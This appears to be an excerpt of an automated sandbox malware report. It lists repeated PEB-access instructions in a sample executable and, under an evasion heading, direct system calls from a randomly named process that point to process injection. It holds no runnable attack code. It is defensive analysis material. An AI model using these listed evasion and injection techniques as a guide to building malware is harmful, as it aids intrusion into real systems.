                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0190866E mov eax, dword ptr fs:[00000030h] | 4_2_0190866E
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0190866E mov eax, dword ptr fs:[00000030h] | 4_2_0190866E
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018529A0 mov eax, dword ptr fs:[00000030h] | 4_2_018529A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018529A0 mov eax, dword ptr fs:[00000030h] | 4_2_018529A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018529A0 mov eax, dword ptr fs:[00000030h] | 4_2_018529A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018529A0 mov eax, dword ptr fs:[00000030h] | 4_2_018529A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018529A0 mov eax, dword ptr fs:[00000030h] | 4_2_018529A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018529A0 mov eax, dword ptr fs:[00000030h] | 4_2_018529A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018529A0 mov eax, dword ptr fs:[00000030h] | 4_2_018529A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018529A0 mov eax, dword ptr fs:[00000030h] | 4_2_018529A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018529A0 mov eax, dword ptr fs:[00000030h] | 4_2_018529A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018529A0 mov eax, dword ptr fs:[00000030h] | 4_2_018529A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018529A0 mov eax, dword ptr fs:[00000030h] | 4_2_018529A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018529A0 mov eax, dword ptr fs:[00000030h] | 4_2_018529A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018529A0 mov eax, dword ptr fs:[00000030h] | 4_2_018529A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018409AD mov eax, dword ptr fs:[00000030h] | 4_2_018409AD
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018409AD mov eax, dword ptr fs:[00000030h] | 4_2_018409AD
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018C89B3 mov esi, dword ptr fs:[00000030h] | 4_2_018C89B3
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018C89B3 mov eax, dword ptr fs:[00000030h] | 4_2_018C89B3
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018C89B3 mov eax, dword ptr fs:[00000030h] | 4_2_018C89B3
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0190A9D3 mov eax, dword ptr fs:[00000030h] | 4_2_0190A9D3
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018D69C0 mov eax, dword ptr fs:[00000030h] | 4_2_018D69C0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0184A9D0 mov eax, dword ptr fs:[00000030h] | 4_2_0184A9D0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0184A9D0 mov eax, dword ptr fs:[00000030h] | 4_2_0184A9D0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0184A9D0 mov eax, dword ptr fs:[00000030h] | 4_2_0184A9D0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0184A9D0 mov eax, dword ptr fs:[00000030h] | 4_2_0184A9D0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0184A9D0 mov eax, dword ptr fs:[00000030h] | 4_2_0184A9D0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0184A9D0 mov eax, dword ptr fs:[00000030h] | 4_2_0184A9D0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018749D0 mov eax, dword ptr fs:[00000030h] | 4_2_018749D0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018CE9E0 mov eax, dword ptr fs:[00000030h] | 4_2_018CE9E0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018729F9 mov eax, dword ptr fs:[00000030h] | 4_2_018729F9
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018729F9 mov eax, dword ptr fs:[00000030h] | 4_2_018729F9
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018BE908 mov eax, dword ptr fs:[00000030h] | 4_2_018BE908
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018BE908 mov eax, dword ptr fs:[00000030h] | 4_2_018BE908
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01838918 mov eax, dword ptr fs:[00000030h] | 4_2_01838918
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01838918 mov eax, dword ptr fs:[00000030h] | 4_2_01838918
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018CC912 mov eax, dword ptr fs:[00000030h] | 4_2_018CC912
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018C892A mov eax, dword ptr fs:[00000030h] | 4_2_018C892A
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018D892B mov eax, dword ptr fs:[00000030h] | 4_2_018D892B
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018C0946 mov eax, dword ptr fs:[00000030h] | 4_2_018C0946
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01914940 mov eax, dword ptr fs:[00000030h] | 4_2_01914940
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01866962 mov eax, dword ptr fs:[00000030h] | 4_2_01866962
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01866962 mov eax, dword ptr fs:[00000030h] | 4_2_01866962
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01866962 mov eax, dword ptr fs:[00000030h] | 4_2_01866962
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0188096E mov eax, dword ptr fs:[00000030h] | 4_2_0188096E
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0188096E mov edx, dword ptr fs:[00000030h] | 4_2_0188096E
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0188096E mov eax, dword ptr fs:[00000030h] | 4_2_0188096E
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018CC97C mov eax, dword ptr fs:[00000030h] | 4_2_018CC97C
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018E4978 mov eax, dword ptr fs:[00000030h] | 4_2_018E4978
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018E4978 mov eax, dword ptr fs:[00000030h] | 4_2_018E4978
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01840887 mov eax, dword ptr fs:[00000030h] | 4_2_01840887
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018CC89D mov eax, dword ptr fs:[00000030h] | 4_2_018CC89D
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0186E8C0 mov eax, dword ptr fs:[00000030h] | 4_2_0186E8C0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_019108C0 mov eax, dword ptr fs:[00000030h] | 4_2_019108C0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0190A8E4 mov eax, dword ptr fs:[00000030h] | 4_2_0190A8E4
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0187C8F9 mov eax, dword ptr fs:[00000030h] | 4_2_0187C8F9
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0187C8F9 mov eax, dword ptr fs:[00000030h] | 4_2_0187C8F9
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018CC810 mov eax, dword ptr fs:[00000030h] | 4_2_018CC810
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01862835 mov eax, dword ptr fs:[00000030h] | 4_2_01862835
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01862835 mov eax, dword ptr fs:[00000030h] | 4_2_01862835
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01862835 mov eax, dword ptr fs:[00000030h] | 4_2_01862835
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01862835 mov ecx, dword ptr fs:[00000030h] | 4_2_01862835
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01862835 mov eax, dword ptr fs:[00000030h] | 4_2_01862835
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01862835 mov eax, dword ptr fs:[00000030h] | 4_2_01862835
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018E483A mov eax, dword ptr fs:[00000030h] | 4_2_018E483A
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018E483A mov eax, dword ptr fs:[00000030h] | 4_2_018E483A
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0187A830 mov eax, dword ptr fs:[00000030h] | 4_2_0187A830
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01852840 mov ecx, dword ptr fs:[00000030h] | 4_2_01852840
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01870854 mov eax, dword ptr fs:[00000030h] | 4_2_01870854
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01844859 mov eax, dword ptr fs:[00000030h] | 4_2_01844859
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01844859 mov eax, dword ptr fs:[00000030h] | 4_2_01844859
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018D6870 mov eax, dword ptr fs:[00000030h] | 4_2_018D6870
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018D6870 mov eax, dword ptr fs:[00000030h] | 4_2_018D6870
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018CE872 mov eax, dword ptr fs:[00000030h] | 4_2_018CE872
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018CE872 mov eax, dword ptr fs:[00000030h] | 4_2_018CE872
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01850BBE mov eax, dword ptr fs:[00000030h] | 4_2_01850BBE
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01850BBE mov eax, dword ptr fs:[00000030h] | 4_2_01850BBE
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018F4BB0 mov eax, dword ptr fs:[00000030h] | 4_2_018F4BB0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018F4BB0 mov eax, dword ptr fs:[00000030h] | 4_2_018F4BB0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01840BCD mov eax, dword ptr fs:[00000030h] | 4_2_01840BCD
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01840BCD mov eax, dword ptr fs:[00000030h] | 4_2_01840BCD
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01840BCD mov eax, dword ptr fs:[00000030h] | 4_2_01840BCD
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01860BCB mov eax, dword ptr fs:[00000030h] | 4_2_01860BCB
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01860BCB mov eax, dword ptr fs:[00000030h] | 4_2_01860BCB
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01860BCB mov eax, dword ptr fs:[00000030h] | 4_2_01860BCB
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018EEBD0 mov eax, dword ptr fs:[00000030h] | 4_2_018EEBD0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01848BF0 mov eax, dword ptr fs:[00000030h] | 4_2_01848BF0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01848BF0 mov eax, dword ptr fs:[00000030h] | 4_2_01848BF0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01848BF0 mov eax, dword ptr fs:[00000030h] | 4_2_01848BF0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0186EBFC mov eax, dword ptr fs:[00000030h] | 4_2_0186EBFC
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018CCBF0 mov eax, dword ptr fs:[00000030h] | 4_2_018CCBF0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01914B00 mov eax, dword ptr fs:[00000030h] | 4_2_01914B00
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018BEB1D mov eax, dword ptr fs:[00000030h] | 4_2_018BEB1D
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018BEB1D mov eax, dword ptr fs:[00000030h] | 4_2_018BEB1D
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018BEB1D mov eax, dword ptr fs:[00000030h] | 4_2_018BEB1D
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018BEB1D mov eax, dword ptr fs:[00000030h] | 4_2_018BEB1D
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018BEB1D mov eax, dword ptr fs:[00000030h] | 4_2_018BEB1D
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018BEB1D mov eax, dword ptr fs:[00000030h] | 4_2_018BEB1D
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018BEB1D mov eax, dword ptr fs:[00000030h] | 4_2_018BEB1D
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018BEB1D mov eax, dword ptr fs:[00000030h] | 4_2_018BEB1D
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018BEB1D mov eax, dword ptr fs:[00000030h] | 4_2_018BEB1D
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0186EB20 mov eax, dword ptr fs:[00000030h] | 4_2_0186EB20
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0186EB20 mov eax, dword ptr fs:[00000030h] | 4_2_0186EB20
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01908B28 mov eax, dword ptr fs:[00000030h] | 4_2_01908B28
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01908B28 mov eax, dword ptr fs:[00000030h] | 4_2_01908B28
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018F4B4B mov eax, dword ptr fs:[00000030h] | 4_2_018F4B4B
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018F4B4B mov eax, dword ptr fs:[00000030h] | 4_2_018F4B4B
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01912B57 mov eax, dword ptr fs:[00000030h] | 4_2_01912B57
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01912B57 mov eax, dword ptr fs:[00000030h] | 4_2_01912B57
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01912B57 mov eax, dword ptr fs:[00000030h] | 4_2_01912B57
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01912B57 mov eax, dword ptr fs:[00000030h] | 4_2_01912B57
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018E8B42 mov eax, dword ptr fs:[00000030h] | 4_2_018E8B42
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018D6B40 mov eax, dword ptr fs:[00000030h] | 4_2_018D6B40
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018D6B40 mov eax, dword ptr fs:[00000030h] | 4_2_018D6B40
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0190AB40 mov eax, dword ptr fs:[00000030h] | 4_2_0190AB40
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01838B50 mov eax, dword ptr fs:[00000030h] | 4_2_01838B50
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018EEB50 mov eax, dword ptr fs:[00000030h] | 4_2_018EEB50
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0183CB7E mov eax, dword ptr fs:[00000030h] | 4_2_0183CB7E
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0184EA80 mov eax, dword ptr fs:[00000030h] | 4_2_0184EA80
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0184EA80 mov eax, dword ptr fs:[00000030h] | 4_2_0184EA80
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0184EA80 mov eax, dword ptr fs:[00000030h] | 4_2_0184EA80
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0184EA80 mov eax, dword ptr fs:[00000030h] | 4_2_0184EA80
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0184EA80 mov eax, dword ptr fs:[00000030h] | 4_2_0184EA80
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0184EA80 mov eax, dword ptr fs:[00000030h] | 4_2_0184EA80
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0184EA80 mov eax, dword ptr fs:[00000030h] | 4_2_0184EA80
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0184EA80 mov eax, dword ptr fs:[00000030h] | 4_2_0184EA80
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0184EA80 mov eax, dword ptr fs:[00000030h] | 4_2_0184EA80
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01914A80 mov eax, dword ptr fs:[00000030h] | 4_2_01914A80
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01878A90 mov edx, dword ptr fs:[00000030h] | 4_2_01878A90
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01848AA0 mov eax, dword ptr fs:[00000030h] | 4_2_01848AA0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01848AA0 mov eax, dword ptr fs:[00000030h] | 4_2_01848AA0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01896AA4 mov eax, dword ptr fs:[00000030h] | 4_2_01896AA4
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01896ACC mov eax, dword ptr fs:[00000030h] | 4_2_01896ACC
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01896ACC mov eax, dword ptr fs:[00000030h] | 4_2_01896ACC
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01896ACC mov eax, dword ptr fs:[00000030h] | 4_2_01896ACC
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01840AD0 mov eax, dword ptr fs:[00000030h] | 4_2_01840AD0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01874AD0 mov eax, dword ptr fs:[00000030h] | 4_2_01874AD0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_01874AD0 mov eax, dword ptr fs:[00000030h] | 4_2_01874AD0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0187AAEE mov eax, dword ptr fs:[00000030h] | 4_2_0187AAEE
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_0187AAEE mov eax, dword ptr fs:[00000030h] | 4_2_0187AAEE
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe | Code function: 4_2_018CCA11 mov eax, dword ptr fs:[00000030h] | 4_2_018CCA11
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187CA24 mov eax, dword ptr fs:[00000030h]4_2_0187CA24
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186EA2E mov eax, dword ptr fs:[00000030h]4_2_0186EA2E
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01864A35 mov eax, dword ptr fs:[00000030h]4_2_01864A35
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01864A35 mov eax, dword ptr fs:[00000030h]4_2_01864A35
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0187CA38 mov eax, dword ptr fs:[00000030h]4_2_0187CA38
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01846A50 mov eax, dword ptr fs:[00000030h]4_2_01846A50
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01846A50 mov eax, dword ptr fs:[00000030h]4_2_01846A50
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01846A50 mov eax, dword ptr fs:[00000030h]4_2_01846A50
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01846A50 mov eax, dword ptr fs:[00000030h]4_2_01846A50
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01846A50 mov eax, dword ptr fs:[00000030h]4_2_01846A50
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01846A50 mov eax, dword ptr fs:[00000030h]4_2_01846A50
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | NtResumeThread: Direct from: 0x773836AC
Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | NtMapViewOfSection: Direct from: 0x77382D1C
Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | NtWriteVirtualMemory: Direct from: 0x77382E3C
Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | NtProtectVirtualMemory: Direct from: 0x77382F9C
Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | NtSetInformationThread: Direct from: 0x773763F9
Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | NtCreateMutant: Direct from: 0x773835CC
Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | NtNotifyChangeKey: Direct from: 0x77383C2C
Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | NtSetInformationProcess: Direct from: 0x77382C5C
Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | NtCreateUserProcess: Direct from: 0x7738371C
Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | NtQueryInformationProcess: Direct from: 0x77382C26
Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | NtResumeThread: Direct from: 0x77382FBC
Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | NtWriteVirtualMemory: Direct from: 0x7738490C
Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | NtAllocateVirtualMemory: Direct from: 0x77383C9C
Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | NtReadFile: Direct from: 0x77382ADC
Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | NtAllocateVirtualMemory: Direct from: 0x77382BFC
Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | NtDelayExecution: Direct from: 0x77382DDC
Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | NtQuerySystemInformation: Direct from: 0x77382DFC
Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | NtOpenSection: Direct from: 0x77382E0C
Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | NtQueryVolumeInformationFile: Direct from: 0x77382F2C
Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | NtQuerySystemInformation: Direct from: 0x773848CC
Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | NtReadVirtualMemory: Direct from: 0x77382E8C
Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | NtCreateKey: Direct from: 0x77382C6C
Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exe | NtAllocateVirtualMemory: Direct from: 0x773848EC
